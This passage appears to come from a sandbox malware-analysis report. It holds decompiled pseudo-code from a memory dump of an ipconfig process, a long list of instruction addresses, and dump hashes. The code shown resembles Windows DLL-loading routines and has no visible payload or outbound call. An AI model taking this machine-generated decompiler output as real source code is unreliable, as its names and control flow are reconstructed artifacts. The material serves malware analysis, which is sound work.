										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x402f40
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x402e90
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x402f40
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x41aa70
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E02EAFFB0(_t287, _t353, 0x2f884d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E02EECC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E02EA6600(0x2f852d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E02EA7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x2f8b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E02F1E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x2f88472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x2f8b218; // 0x0
														asm("ror edi, cl");
														 *0x2f8b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E02EB2280(_t250, 0x2f884d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L02ED3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E02EAFFB0(_t293, _t353, 0x2f884d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E02ED37F5(_t353, 0);
																}
																E02ED0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E02EC9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E02EC02D6(_t174);
																}
																L02EB77F0( *0x2f87b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E02ECC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L02EAEC7F(_t353);
										L02EC19B8(_t287, 0, _t353, 0);
										_t200 = E02E9F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E02EDB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x2f8b2f8; // 0x700000
									if((_t206 |  *0x2f8b2fc) == 0 || ( *0x2f8b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x2f8b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E02F46B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E02F46AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E02EAE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L02EAEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E02ED9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E02EAE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L02EA8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E02ED3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































              0x02ead5f2
              0x02ead5f5
              0x02ead5f5
              0x02ead5fd
              0x02ead600
              0x02ead60a
              0x02ead60d
              0x02ead617
              0x02ead61d
              0x02ead627
              0x02ead62e
              0x02ead911
              0x02ead913
              0x00000000
              0x02ead919
              0x02ead919
              0x02ead919
              0x02ead634
              0x02ead634
              0x02ead634
              0x02ead634
              0x02ead640
              0x02ead8bf
              0x00000000
              0x02ead646
              0x02ead646
              0x02ead64d
              0x02ead652
              0x02efb2fc
              0x02efb2fc
              0x02efb302
              0x02efb33b
              0x02efb341
              0x00000000
              0x02efb304
              0x02efb304
              0x02efb319
              0x02efb31e
              0x02efb324
              0x02efb326
              0x02efb332
              0x02efb347
              0x02efb34c
              0x02efb351
              0x02efb35a
              0x00000000
              0x02efb328
              0x02efb328
              0x00000000
              0x02efb328
              0x02efb326
              0x02ead658
              0x02ead658
              0x02ead65b
              0x02ead665
              0x00000000
              0x02ead66b
              0x02ead66b
              0x02ead66b
              0x02ead66b
              0x02ead66d
              0x02ead672
              0x02ead67a
              0x00000000
              0x00000000
              0x02ead680
              0x02ead686
              0x02ead8ce
              0x02ead8d4
              0x02ead8da
              0x02ead8dd
              0x02ead8dd
              0x02ead8e0
              0x02ead68c
              0x02ead691
              0x02ead69d
              0x02ead6a2
              0x02ead6a7
              0x02ead6b0
              0x02ead6b0
              0x02ead6b5
              0x02ead6e0
              0x02ead6b7
              0x02ead6b7
              0x02ead6b9
              0x02ead6b9
              0x02ead6bb
              0x02ead6bd
              0x02ead6ce
              0x02ead6d0
              0x02ead6d2
              0x02efb363
              0x02efb365
              0x00000000
              0x02efb36b
              0x00000000
              0x02efb36b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02ead6bf
              0x02ead6bf
              0x02ead6e5
              0x02ead6e7
              0x02ead6e9
              0x02ead6e9
              0x02ead6ec
              0x02ead6ec
              0x02ead6ef
              0x02ead6f5
              0x02ead6f9
              0x02ead6fb
              0x02ead6fd
              0x02ead701
              0x02ead703
              0x02ead70a
              0x02ead70a
              0x02ead70a
              0x02ead701
              0x02ead70d
              0x02ead710
              0x02ead710
              0x02ead6c1
              0x02ead6c1
              0x02ead6c1
              0x02ead6c6
              0x02efb36d
              0x02efb36f
              0x00000000
              0x02efb375
              0x02efb375
              0x02efb375
              0x00000000
              0x02efb375
              0x00000000
              0x02ead6cc
              0x02ead6d8
              0x02ead6d8
              0x02ead6d8
              0x00000000
              0x02ead6c6
              0x02ead6bf
              0x00000000
              0x02ead6da
              0x02ead6da
              0x02ead716
              0x02ead71b
              0x02ead720
              0x02ead726
              0x02ead726
              0x02ead72d
              0x00000000
              0x02ead733
              0x02ead739
              0x02ead742
              0x02ead750
              0x02ead758
              0x02ead764
              0x02ead776
              0x02ead77a
              0x02ead783
              0x02ead928
              0x02ead92c
              0x02ead93d
              0x02ead944
              0x02ead94f
              0x02ead954
              0x02ead956
              0x02ead95f
              0x02ead961
              0x02ead973
              0x02ead973
              0x02ead956
              0x02ead944
              0x02ead92c
              0x02ead78b
              0x02efb394
              0x02ead791
              0x02ead798
              0x02efb3a3
              0x02efb3bb
              0x02efb3bb
              0x02ead7a5
              0x02ead866
              0x02ead870
              0x02ead884
              0x02ead892
              0x02ead898
              0x02ead89e
              0x02ead8a0
              0x02ead8a6
              0x02ead8ac
              0x02ead8ae
              0x02ead8b4
              0x02ead8b4
              0x02ead8ae
              0x02ead7a5
              0x02ead78b
              0x02ead7b1
              0x02efb3c5
              0x02efb3c5
              0x02ead7c3
              0x02ead7ca
              0x02ead7e5
              0x02ead7eb
              0x02ead8eb
              0x02ead8ed
              0x00000000
              0x02ead8f3
              0x02ead8f3
              0x02ead8f3
              0x00000000
              0x02ead8ed
              0x02ead7cc
              0x02ead7cc
              0x02ead7d2
              0x00000000
              0x02ead7d4
              0x02ead7d4
              0x02ead7d7
              0x02ead7df
              0x02efb3d4
              0x02efb3d9
              0x02efb3dc
              0x02efb3dc
              0x02efb3df
              0x02efb3e2
              0x02efb468
              0x02efb46d
              0x02efb46f
              0x02efb46f
              0x02efb475
              0x02ead8f8
              0x02ead8f9
              0x02ead8fd
              0x02efb3e8
              0x02efb3e8
              0x02efb3eb
              0x02efb3ed
              0x00000000
              0x02efb3ef
              0x02efb3ef
              0x02efb3f1
              0x02efb3f4
              0x02efb3fe
              0x02efb404
              0x02efb409
              0x02efb40e
              0x02efb410
              0x02efb410
              0x02efb414
              0x02efb414
              0x02efb41b
              0x02efb420
              0x02efb423
              0x02efb425
              0x02efb427
              0x02efb42a
              0x02efb42d
              0x02efb42d
              0x02efb42a
              0x02efb432
              0x02efb436
              0x02efb438
              0x02efb43b
              0x02efb43b
              0x02efb449
              0x02efb44e
              0x02efb454
              0x02efb458
              0x02efb458
              0x02efb45d
              0x00000000
              0x02efb45d
              0x02efb3ed
              0x00000000
              0x00000000
              0x00000000
              0x02ead7df
              0x02ead7d2
              0x02ead7ca
              0x02efb37c
              0x02efb37e
              0x02efb385
              0x02efb38a
              0x00000000
              0x02efb38a
              0x02ead742
              0x02ead7f1
              0x02ead7f8
              0x02efb49b
              0x02efb49b
              0x02ead800
              0x02ead837
              0x02ead843
              0x02ead845
              0x02ead847
              0x02ead84a
              0x02ead84b
              0x02ead84e
              0x02ead857
              0x02ead802
              0x02ead802
              0x02ead80d
              0x00000000
              0x02ead818
              0x02ead818
              0x02ead824
              0x02ead831
              0x02efb4a5
              0x02efb4ab
              0x02efb4b3
              0x02efb4b8
              0x02efb4bb
              0x00000000
              0x02efb4c1
              0x02efb4c1
              0x02efb4c8
              0x00000000
              0x02efb4ce
              0x02efb4d4
              0x02efb4e1
              0x02efb4e3
              0x02efb4e5
              0x00000000
              0x02efb4eb
              0x02efb4f0
              0x02efb4f2
              0x02eadac9
              0x02eadacc
              0x02eadacf
              0x02eadad1
              0x02eadd78
              0x02eadd78
              0x02eadcf2
              0x00000000
              0x02eadad7
              0x02eadad9
              0x02eadadb
              0x00000000
              0x00000000
              0x02eadae1
              0x02eadae1
              0x02eadae4
              0x02eadae6
              0x02efb4f9
              0x02efb4f9
              0x02efb500
              0x02eadaec
              0x02eadaec
              0x02eadaf5
              0x02eadaf8
              0x02eadafb
              0x02eadb03
              0x02eadb11
              0x02eadb16
              0x02eadb19
              0x02eadb1b
              0x02efb52c
              0x02efb531
              0x02efb534
              0x02eadb21
              0x02eadb21
              0x02eadb24
              0x02eadcd9
              0x02eadce2
              0x02eadce5
              0x02eadd6a
              0x02eadd6d
              0x00000000
              0x02eadd73
              0x02efb51a
              0x02efb51c
              0x02efb51f
              0x02efb524
              0x00000000
              0x02efb524
              0x02eadce7
              0x02eadce7
              0x02eadce7
              0x00000000
              0x02eadce7
              0x00000000
              0x02eadb2a
              0x02eadb2c
              0x02eadb31
              0x02eadb33
              0x02eadb36
              0x02eadb39
              0x02eadb3b
              0x02eadb66
              0x02eadb66
              0x02eadb3d
              0x02eadb3d
              0x02eadb3e
              0x02eadb46
              0x02eadb47
              0x02eadb49
              0x02eadb4c
              0x02eadb53
              0x02eadb55
              0x02eadb58
              0x02eadb5a
              0x02efb50a
              0x02efb50f
              0x02efb512
              0x02eadb60
              0x02eadb60
              0x02eadb63
              0x02eadb63
              0x00000000
              0x02eadb63
              0x02eadb5a
              0x02eadb3b
              0x02eadb24
              0x02eadb69
              0x02eadb69
              0x02eadb6c
              0x02eadb6f
              0x02eadb74
              0x02efb557
              0x02efb557
              0x02efb55e
              0x02eadb7a
              0x02eadb7c
              0x02eadb7f
              0x02eadb82
              0x02eadb85
              0x00000000
              0x02eadb8b
              0x02eadb8b
              0x02eadb8d
              0x02eadb9b
              0x02eadb9b
              0x02eadb9d
              0x02eadba0
              0x02eadba2
              0x02eadba4
              0x02eadba7
              0x02eadba9
              0x02eadbae
              0x02eadbae
              0x02eadbb1
              0x02eadbb4
              0x02eadbb4
              0x02eadbb7
              0x02eadbba
              0x02eadcd2
              0x02eadcd4
              0x00000000
              0x02eadbc0
              0x02eadbc0
              0x02eadbd2
              0x02eadbd7
              0x02eadbda
              0x02eadbdd
              0x02eadbdf
              0x00000000
              0x02eadbe5
              0x02eadbe5
              0x02eadbee
              0x02eadbf1
              0x02efb541
              0x02efb544
              0x00000000
              0x02efb546
              0x02efb546
              0x00000000
              0x02efb546
              0x02eadbf7
              0x02eadbf7
              0x02eadbfd
              0x02eadbfd
              0x02eadbff
              0x02eadc0b
              0x02eadc15
              0x02eadc1b
              0x02eadc1d
              0x02eadc21
              0x02eadc21
              0x02eadc23
              0x02eadc23
              0x02eadc26
              0x02eadc29
              0x02eadc2b
              0x00000000
              0x00000000
              0x02eadc31
              0x02eadc34
              0x02eadc36
              0x02eadcbf
              0x02eadcbf
              0x02eadcc2
              0x00000000
              0x02eadc3c
              0x02eadc41
              0x02eadc43
              0x00000000
              0x02eadc45
              0x02eadc45
              0x02eadc47
              0x00000000
              0x02eadc4d
              0x02eadc4d
              0x02eadc50
              0x02eadc52
              0x02eadc55
              0x02eadcfa
              0x02eadcfe
              0x02eadd08
              0x02eadd0a
              0x02eadd0c
              0x00000000
              0x02eadd12
              0x02eadd15
              0x02eadd2d
              0x02eadd2f
              0x02eadd32
              0x02eadd35
              0x00000000
              0x02eadd35
              0x02eadc5b
              0x02eadc5b
              0x02eadc5e
              0x02eadc61
              0x02eadc64
              0x02eadc67
              0x02eadc67
              0x02eadc6a
              0x02eadc6c
              0x02eadc8e
              0x02eadc8e
              0x02eadc91
              0x02eadc93
              0x02eadcce
              0x02eadcce
              0x02eadc95
              0x02eadc9c
              0x02eadc6e
              0x02eadc72
              0x02eadc75
              0x02eadc77
              0x02eadc79
              0x02efb551
              0x02efb551
              0x00000000
              0x02eadc7f
              0x02eadc7f
              0x02eadc81
              0x00000000
              0x02eadc83
              0x02eadc86
              0x02eadc88
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eadc88
              0x02eadc81
              0x02eadc79
              0x02eadc6c
              0x02eadc55
              0x02eadc47
              0x02eadc43
              0x00000000
              0x02eadc36
              0x02eadc23
              0x00000000
              0x02eadbff
              0x02eadbf1
              0x02eadbdf
              0x02eadb8f
              0x02eadb92
              0x02eadb95
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x02eadb95
              0x02eadb8d
              0x02eadb85
              0x02eadb74
              0x02eadc9f
              0x02eadca2
              0x02eadcb0
              0x02eadcb0
              0x02eadad1
              0x02efb4e5
              0x02efb4c8
              0x00000000
              0x00000000
              0x00000000
              0x02ead831
              0x02ead80d
              0x00000000
              0x02ead800
              0x02efb47f
              0x02efb485
              0x00000000
              0x02efb485
              0x02ead665
              0x02ead652
              0x00000000

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 47e8f311b76ed44a712aa25106241fc882b2d1d51f65d025551e78a62e19c2da
              • Instruction ID: 2e6bf3b956dfc4f040dd06582b5ade9c364a21c185e60ec86fcbb9464805f4de
              • Opcode Fuzzy Hash: 47e8f311b76ed44a712aa25106241fc882b2d1d51f65d025551e78a62e19c2da
              • Instruction Fuzzy Hash: 83E1E330A80359CFDB25DF18CD64BA9B7B6BF8530CF049199E9099B690D770A981CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02EA849B Relevance: .3, Instructions: 290COMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E02EA849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x2f6f9c0);
				E02EED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x2f87b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E02EACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E02EB2280( *[fs:0x30], 0x2f88550);
						_t139 =  *0x2f87b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E02ECF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E02EAFFB0(_t193, _t235, 0x2f88550);
								L5:
								return E02EED130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E02E91C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x2f87b9c; // 0x0
							_t235 = L02EB4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x2f87b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E02ECA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E02EAFFB0(_t193, _t235, 0x2f88550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L02EB77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L02EB77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x2f87b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x2f87b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E02ED37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x2f87b9c; // 0x0
									_t214 = L02EB4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
